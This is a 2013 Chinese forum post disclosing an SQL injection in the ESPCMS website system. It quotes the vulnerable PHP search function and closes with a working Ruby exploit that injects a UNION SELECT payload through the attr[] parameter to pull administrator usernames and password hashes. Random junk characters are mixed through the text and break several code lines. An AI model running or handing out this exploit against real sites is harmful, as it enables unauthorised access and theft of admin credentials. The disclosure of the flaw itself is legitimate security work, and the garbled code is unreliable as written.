0×0 漏洞概述0×1 漏洞细节- N3 \. p* a1 o/ P, W
0×2 PoC+ w& U" |0 d; d9 V! W |9 y5 ?
( L+ m/ R/ i: V* `- r
: s2 ]$ I7 ]. ?" M' f4 p, y' Y
. J. z9 u* x i, s; `$ T: n0×0 漏洞概述
7 i6 H. g1 \, B2 k, a8 j$ b+ r, Y9 f/ [5 Y: @
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。9 Y _, M S8 S! B# }5 E
其在处理传入的参数时考虑不严谨导致SQL注入发生
+ G Y9 r7 B" J. B& T
* k7 I5 Z3 d- j5 o* A. {: {4 z B
; ^: j7 c6 r4 m5 ~6 s0×1 漏洞细节
/ c$ z0 i \ _( y
6 ?+ x; K1 A; S2 I7 j变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。. O8 D, ?, X7 v! l) w" d1 z
正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。# E$ b8 X" |( A' C/ J
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。. }5 Z9 c1 ?2 b$ z+ S% E
" H, R" J7 t; w8 E% W在/interface/3gwap_search.php文件的in_result函数中:
$ e: a- J4 Y) @2 e3 L, c/ ]* p7 E) k9 {. ?
) |3 K, M) I% d8 V/ T* A+ E" v/ M8 a
function in_result() {* u. e7 F) ?! E' c( r9 k: s! D) F# s' U
... ... ... ... ... ... ... ... ...
& q9 ?2 q$ N* e' e% G( f0 g( e $urlcode = $_SERVER[ 'QUERY_STRING '];% N7 o1 U- m2 G9 I
parse_str(html_entity_decode($urlcode), $output);
( b9 I/ G/ h/ f6 W; l& K7 M" n' u) O; N* T E, d( Q, h! u, c7 m
... ... ... ... ... ... ... ... ...
5 v! O% y( [/ Q+ S if (is_array($output['attr' ]) && count($output['attr']) > 0) {
" J: z- K5 _: \! I3 p+ X
, [9 d9 `: m/ F $db_table = db_prefix . 'model_att';% p2 X6 n( ]/ T& @: J6 I
$ F) h \0 [& @- H; Q5 \) [
foreach ($output['attr' ] as $key => $value) {
1 b- f+ [+ ?% N& w: ^; w# S1 X if ($value) {
" n0 T5 g: i, }- r9 C* Y9 F R2 U
$key = addslashes($key);
. [9 j4 I0 Y: ^. v$ w6 L $key = $this-> fun->inputcodetrim($key);
; m- F- O+ [9 }; ?% w R $db_att_where = " WHERE isclass=1 AND attrname='$key'";
' z" P1 t0 v' E $countnum = $this->db_numrows($db_table, $db_att_where);
$ ~( \5 ]% L- | if ($countnum > 0) {3 a! F$ X6 f0 j0 _
$db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
- T7 L: U8 l6 D3 L; j) ~3 p1 Z* G) J }
: b" j2 l3 f3 R0 R }
+ s ]8 z% I- o! G1 E, R5 b. d }
$ s* U9 g* Q: j3 h" n# D# s; k }2 B5 e4 \8 P5 n/ v# _
if (!empty ($keyword) && empty($keyname)) {
/ |* M" U8 @; X$ T' ` $keyname = 'title';$ K; i `- R8 R8 S6 a$ _/ d+ c
$db_where.= " AND a.title like '%$keyword%'" ;" g- z9 ]; J/ Q% i" Q: k
} elseif (!empty ($keyword) && !empty($keyname)) {: \* b4 ]" L% H' t/ R# G
$db_where.= " AND $keyname like '% $keyword%'";$ f! s% x/ j+ T2 \/ G. X% K0 @9 j
}# `' q' M& k- s& D( U- e
$pagemax = 15;- D0 a" G- n9 g" A0 e
" }: P' h {5 w% m' Z $pagesylte = 1;
9 B2 w. \) _5 v" Z$ T! X% V; u$ ~" K1 q* K$ }- J+ f
if ($countnum > 0) {
4 S8 `8 w$ d( B* o
1 S1 d, F \& Q1 e% j2 } $numpage = ceil($countnum / $pagemax);
) B3 e0 m+ |+ ~ } else {4 l1 K1 G- m# T5 z
$numpage = 1;
# r( a9 p% w" i* s- k6 j }' w8 n9 R9 @9 v$ S
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;* [$ @* Z) h9 v
$this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);( ~% u! T- G8 Y" j2 Q$ f
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
* l" n" O/ }3 p6 ?1 T8 t ... ... ... ... ... ... ... ... ...7 t8 v8 f1 o3 h% D# k" O
}
8 s+ K9 E& w) x, m& O7 I0 {! ?$ N- P6 m k9 |/ o9 N1 Q
; E' L6 \( J- ] ?' j0×2 PoC; c, |9 g- R$ O8 W' }- p2 s, X5 u
6 F* j6 F( G0 V4 s/ w- b" z) C% } i. f
2 l( `4 A* w0 G: }
require "net/http"
9 g, r3 K' S! M7 h
: H2 P7 g4 M& V% w W. A( \7 |def request(method, url)$ T* x9 \; T" h3 o3 c( {6 w
if method.eql?("get")& F. B5 e. ?0 [) z
uri = URI.parse(url)+ n" z* V8 @) A, O
http = Net::HTTP.new(uri.host, uri.port)
' C: L+ }$ X) N; ]) o, d response = http.request(Net::HTTP::Get.new(uri.request_uri))7 s- v2 ~, y7 Y5 f! K
return response
c2 }0 f( j9 b5 C7 F end( ?$ O$ J: T9 ~0 r1 T" T( l
end
F6 n" M2 }+ F- J9 U; K5 }$ |( j7 M
doc =<<HERE/ W$ m- q4 C* ?, ^5 }8 P9 S3 I* m
-------------------------------------------------------
4 |2 E+ x; u6 b$ h% p$ |Espcms Injection Exploit
5 s3 {1 g; C" T* UAuthor:ztz2 Y. ?0 W# ~+ S! v" ?7 d
Blog:http://ztz.fuzzexp.org/
* M* s# Y0 s* p# s/ G7 D-------------------------------------------------------$ i' y& }; {# @2 v+ Y' K5 ~7 H$ K4 W
2 ~$ J3 H/ Y( A# U7 k; h/ Y3 P
HERE
. k8 {+ A" n2 b( Z. r6 d
1 ]2 X3 Z& q! Zusage =<<HERE
. n T& X: K9 _$ a( p5 qUsage: ruby #{$0} host port path
* D c P( y) B1 K" r% t9 bexample: ruby #{$0} www.target.com 80 /# c/ c. w8 c" h# r7 I7 ~8 f
HERE) P' G; I7 ?9 @) B+ D1 H* \2 K4 [
L% u% s. V' ^3 J" Q4 [
puts doc* l4 R4 J) K% u: Q4 y
if ARGV.length < 3
. H8 ?) j. G) r* y2 v% c puts usage
" K |1 ?% h3 I. `& s0 ]; _( delse# e- }4 r. y% [& _2 m
$host = ARGV[0]
' S. W8 [; T6 @7 P/ N9 ?$ E- U' k& n $port = ARGV[1]+ r! t. f# F o; ^: ?0 o
$path = ARGV[2]
' q/ F# e1 a/ X* u+ A. F) S2 p
" P. M) W2 G, U( r puts "send request..."
# m& [$ n* q p2 K url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
- w8 G2 D+ J- V% c8 f7 Battr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
: ?; h' O* q8 q1 d) \,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27$ g# F1 r% c- @
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"& e; y3 Z) W" k% ]$ G5 F
response = request("get", url)
9 d- u4 G' v7 a3 Q( n' q result = response.body.scan(/\w+&\w{32}/)
; X' |! P0 u& s) J3 n+ D$ K puts result
& }0 E6 ~. N2 _# @) Fend7 A5 w+ ~2 M" A% G
" j) {2 |% \: R0 F
|
发表于 2013-7-27 18:31:52
收藏
支持
反对